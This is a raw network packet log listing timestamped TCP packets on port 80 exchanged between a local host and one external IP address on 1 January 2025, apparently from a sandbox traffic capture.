Jan 1, 2025 08:54:03.562913895 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562922955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562933922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562943935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562956095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562957048 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562967062 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562973976 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562978029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562993050 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.563011885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.563023090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.563033104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.563041925 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.563062906 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565483093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565493107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565505028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565515041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565526962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565536022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565546989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565557003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565565109 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565567970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565607071 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565627098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565642118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565651894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565669060 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565696955 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565779924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565790892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565802097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565813065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565821886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565833092 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565833092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565850019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565871954 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.565988064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.565996885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566008091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566018105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566028118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566035986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566039085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566051006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566056013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566076040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566268921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566279888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566291094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566299915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566310883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566317081 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566322088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566334009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566343069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566348076 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566354990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566365004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566371918 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566390991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566584110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566595078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566605091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566615105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566623926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566632032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566632986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566646099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566659927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566663980 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566672087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566683054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566687107 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566694975 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566706896 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566744089 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.566952944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566963911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.566972971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.567001104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.615813017 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.651200056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651289940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651299953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651323080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651335001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651345015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651350021 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.651356936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651393890 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.651509047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651526928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651540995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651551008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651556015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.651562929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651597977 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.651634932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.651746988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651757002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651768923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651782036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651792049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651808023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.651849985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.651849985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652056932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652067900 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652077913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652089119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652100086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652110100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652121067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652123928 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652129889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652154922 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652154922 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652213097 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652322054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652395010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652406931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652416945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652426958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652436972 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652447939 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652488947 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652823925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652834892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652843952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652854919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652863979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652870893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652878046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652889013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652899027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652909040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652914047 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652914047 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652920008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652930975 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652939081 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.652940989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652956009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652970076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.652977943 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653002977 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653027058 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653460026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653470993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653480053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653490067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653500080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653508902 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653511047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653522968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653532028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653541088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653552055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653554916 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653554916 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653565884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653578997 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653579950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653592110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653599977 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653603077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653614044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653625965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.653630972 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653671980 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.653713942 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.654102087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654112101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654122114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654131889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654140949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654143095 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.654151917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654162884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654172897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654181957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.654197931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.654236078 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656452894 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656462908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656471968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656516075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656522036 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656527996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656548977 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656569958 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656630993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656641960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656651974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656682014 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656744957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656770945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656780958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656793118 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656841993 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656864882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656876087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656886101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656897068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.656915903 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.656968117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657063007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657073975 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657083988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657094002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657104969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657119036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657124996 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657130003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657140017 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657213926 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657371998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657383919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657426119 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657469034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657480001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657490015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657500029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657510042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657521009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657531977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657546043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657546043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657548904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657562017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.657598019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657598019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.657989025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658005953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658015966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658026934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658036947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658046961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658057928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658063889 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.658067942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658078909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658088923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658099890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.658102989 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.658102989 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.658153057 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743097067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743108988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743119955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743130922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743140936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743174076 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743223906 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743233919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743244886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743257046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743268013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743294001 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743304968 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743437052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743448973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743541002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743581057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743592978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743602037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743630886 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743643045 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743743896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743892908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743906021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743916988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743932009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.743938923 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743964911 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.743968010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744036913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.744225025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744235992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744247913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744257927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744267941 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.744318008 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.744415998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744426966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744436979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744446993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744457006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744468927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744478941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744489908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744501114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744502068 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.744502068 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.744512081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744529963 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.744555950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744568110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744575977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.744590998 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.744590998 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745059967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745071888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745081902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745093107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745116949 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745141983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745217085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745229006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745239019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745249033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745261908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745271921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745281935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745287895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745294094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745299101 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745305061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745330095 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745341063 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745846987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745857954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745867968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745877981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745888948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745903015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745958090 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.745979071 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.745990992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746001005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746011019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746021032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746021986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.746032953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746043921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746053934 CET	80	49730	147.45.44.131	192.168.2.4
